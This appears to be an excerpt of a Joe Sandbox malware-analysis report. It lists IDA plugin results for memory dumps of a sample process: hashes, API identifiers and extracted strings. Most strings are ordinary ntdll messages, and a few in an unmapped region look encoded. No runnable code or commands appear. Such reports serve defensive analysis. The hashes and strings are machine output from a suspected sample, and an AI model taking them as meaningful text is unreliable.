                                                  • Instruction ID: 39dc346d6f9ce3f5c67e230deca3980c63ed46ab81c1ed7fceb8d76f0af55a99
                                                  • Opcode Fuzzy Hash: 764e8b0d09f2be2ba425e450fdd14cf36ad1bb611a154b097324cb81a7885ae2
                                                  • Instruction Fuzzy Hash: 4B310BB090430DEBCF24CF86E441AEDBB71FB40384F918159E8086F368CA748A55CB98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !&<!$"2:Y$"2As$+;2S$;2Dw$<!"$='!&$>2~{$EwpY$XVC!$ZF_^$_}h{~~s='<"2:^{|gj)2G)2S|v`}{v2&< < )2|~?|~)2UF?B' #"2Pg{~v=$`a{}$bb~w$ts`{$wqy}$yw2U${f='$|=&<
                                                  • API String ID: 0-2817562395
                                                  • Opcode ID: cb7ed7d2c4e33d6e2905596a9bf2c5628ee0580a6234525e34802762573ccfdf
                                                  • Instruction ID: e2f42d67bbbbd5ab13c65ebe3e1af3fe087e3b55f14f8e19e8414f8e6b859869
                                                  • Opcode Fuzzy Hash: cb7ed7d2c4e33d6e2905596a9bf2c5628ee0580a6234525e34802762573ccfdf
                                                  • Instruction Fuzzy Hash: 673187B484474CEBCB18CF81E980ADDBBB1FF04784F80508DE8486F259C7758A66CB89
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: c500c3af7c17ec26a57d9379f2ba1a28d7db90f1d8f06032831abd39277c1648
                                                  • Instruction ID: 6ba808874bb93b66068cef3f54ca8e6dc7fccdea6069b57683509403740f10cd
                                                  • Opcode Fuzzy Hash: c500c3af7c17ec26a57d9379f2ba1a28d7db90f1d8f06032831abd39277c1648
                                                  • Instruction Fuzzy Hash: 7A5119B6A00216BFCB11DB9C99C4A7EF7B8BF09340714856BF4A5D7681D234DE5487E0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: d4e9be6a388006e24482ffca81b51bfbeee83c0ea519257982b670066963b8bc
                                                  • Instruction ID: 3aab60e4c5031ac50bf8baca291b8777ca76da02a9c510f99af9c4fa62f83cee
                                                  • Opcode Fuzzy Hash: d4e9be6a388006e24482ffca81b51bfbeee83c0ea519257982b670066963b8bc
                                                  • Instruction Fuzzy Hash: DF51C2B5A00645AEDB30DF9CCDD0A7FB7F9EB44240B48886FE496D7641E778EA408760
                                                  Strings
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A34725
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A34655
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A346FC
                                                  • Execute=1, xrefs: 03A34713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A34787
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A34742
                                                  • ExecuteOptions, xrefs: 03A346A0
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: ba3b3a991429c81504befbc40b18ee045f85ed009ce9d6c3a27e843183c53730
                                                  • Instruction ID: bab3f8b9f1705db192ad12ad3d83c46ddeb58794c375049b842fd4ea5de3307c
                                                  • Opcode Fuzzy Hash: ba3b3a991429c81504befbc40b18ee045f85ed009ce9d6c3a27e843183c53730
                                                  • Instruction Fuzzy Hash: 22513935A003196EDF10EBE9EC85FAE73BCEF49380F04049AE605AB2D1E7719A418F51
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction ID: 0973df876b178b702ba95fd417e4a2b98a99e2670cd0d8a5afdfff5379593d22
                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction Fuzzy Hash: 10023674508341AFEB05CF18C590A6BBBF5EFC8714F048A2EF9896B260DB31E905CB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction ID: 68658b3a77ef579172422940396d6ccd5d23ea28d392d00242ad431b45192f2b
                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction Fuzzy Hash: 47818E74E462499EDF28CF68EA917AEBBB5AF46310F1C455FD861A73E0C634D8408B70
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: cd752fcf8704289bec25045bae8b3eefaa83a8d7e893dd46ebbc415867c87013
                                                  • Instruction ID: ec9a513b3e3715e7862c145666584ded0c5a0bb52e46b8ef831643aa594deffc
                                                  • Opcode Fuzzy Hash: cd752fcf8704289bec25045bae8b3eefaa83a8d7e893dd46ebbc415867c87013
                                                  • Instruction Fuzzy Hash: BD21627AA00259ABCB10DF79DD84AEEB7FCEF44640F08052BE945E7241E730DA018BA1
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A302BD
                                                  • RTL: Re-Waiting, xrefs: 03A3031E
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A302E7
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 37f269db6de40c5bdbb6780c20549c63f6b9a94025e44bed7cce027993622bfa
                                                  • Instruction ID: e13839243e09a7d08f8437b49402913a28d15a05d7a27664619bbf41935d9dcf
                                                  • Opcode Fuzzy Hash: 37f269db6de40c5bdbb6780c20549c63f6b9a94025e44bed7cce027993622bfa
                                                  • Instruction Fuzzy Hash: F0E1CD31608741DFD726CF28C884B2AB7E4BF89714F190A6EF5A68B2E1D775D844CB42
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 03A37BAC
                                                  • RTL: Resource at %p, xrefs: 03A37B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A37B7F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 33f51eb8db25538ebc49bf6a0899a666c8db86acbc20c9e794de4cad3fb8cf85
                                                  • Instruction ID: f0fca633a95db865d017e753c9ed340577e25dabee1b5afea3c6ac548b966554
                                                  • Opcode Fuzzy Hash: 33f51eb8db25538ebc49bf6a0899a666c8db86acbc20c9e794de4cad3fb8cf85
                                                  • Instruction Fuzzy Hash: C041AF357047029FD724DF29CD40B6AB7E9EF89720F140A1EFA5A9B780DB71E8058B91
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A3728C
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 03A372C1
                                                  • RTL: Resource at %p, xrefs: 03A372A3
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A37294
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 66848e846dfee451ec13311e89b1a722e3f28eb61b6cdeb3c2fa42ed9ba8948e
                                                  • Instruction ID: 3f5aae40607d7513a1c6a496893af665c24f8d93e2f3ad3324f8913cbb888fea
                                                  • Opcode Fuzzy Hash: 66848e846dfee451ec13311e89b1a722e3f28eb61b6cdeb3c2fa42ed9ba8948e
                                                  • Instruction Fuzzy Hash: 4D41FD76704706AFD724CF64CD41F6AB7A9FB85710F140A1AF955AB380DB32E8128BD1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: fdf4bdf7ab12a908cc993e8f89ce59ee105c59403ecdaabf22f987894b8f5d67
                                                  • Instruction ID: 0da461142b346e97c555b14d0669131b3891f44293f5a11326c943286351b77f
                                                  • Opcode Fuzzy Hash: fdf4bdf7ab12a908cc993e8f89ce59ee105c59403ecdaabf22f987894b8f5d67
                                                  • Instruction Fuzzy Hash: AD317876A006199FDB20DF29DD80BEEB7F8EF44650F44455BE849E7240EB30AA558FA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,$82?*$9$7.$;r~<$r~:;
                                                  • API String ID: 0-3609984755
                                                  • Opcode ID: 5ec7075107d8fb2b47e081e121a95a260054eb4898317f5d1b216a327099d5f6
                                                  • Instruction ID: 4fefa96872ee257cff6055a42a6e2e5b8e96155ccef09d6f583882a8870f4660
                                                  • Opcode Fuzzy Hash: 5ec7075107d8fb2b47e081e121a95a260054eb4898317f5d1b216a327099d5f6
                                                  • Instruction Fuzzy Hash: C4F0E9740287889BC708AF14D884A9A77E4FF89309FC0176DF4C9DB251DB39CA458B87
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction ID: 40eab56f97215bcfd8510f3b3f0eb08e3596938b00f5732845a40e3e9c03ebff
                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction Fuzzy Hash: 97919170E002169FDB24DF69E990ABEB7B9AF44720F58461FE865A72C0D736A940CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, Offset: 03990000, based on PE: true
                                                  • Associated: 00000006.00000002.2978912261.0000000003AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3990000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 54b3b0c576c9a9f33482d803a55abc1d3ab30f41a008f9a1197645cdd3b4905c
                                                  • Instruction ID: 493caf0a8a28cd926d58e00ad86b319e047056a17b148e89e4f79705dc15e912
                                                  • Opcode Fuzzy Hash: 54b3b0c576c9a9f33482d803a55abc1d3ab30f41a008f9a1197645cdd3b4905c
                                                  • Instruction Fuzzy Hash: AC814A76D102699BDB71DB54CC45BEEBBB8AB48710F0445EAA909B7240E7309E80CFA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2978600277.0000000003720000.00000040.00000800.00020000.00000000.sdmp, Offset: 03720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_3720000_sc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #i%($6!$K4}v$}v5M
                                                  • API String ID: 0-3327408589
                                                  • Opcode ID: 6f17329c46c633009f51469c6774dec2482ae7fe334d945fcd2e990c3442cd65
                                                  • Instruction ID: 7563299f7b0e89d825ebbc180679b9ad9a9ff4024f44b53f86fe51133f196cad
                                                  • Opcode Fuzzy Hash: 6f17329c46c633009f51469c6774dec2482ae7fe334d945fcd2e990c3442cd65
                                                  • Instruction Fuzzy Hash: 30F03034018B844AD709EB14C44465ABBE5FB9930CF840BADE4CADA155DB79C645878B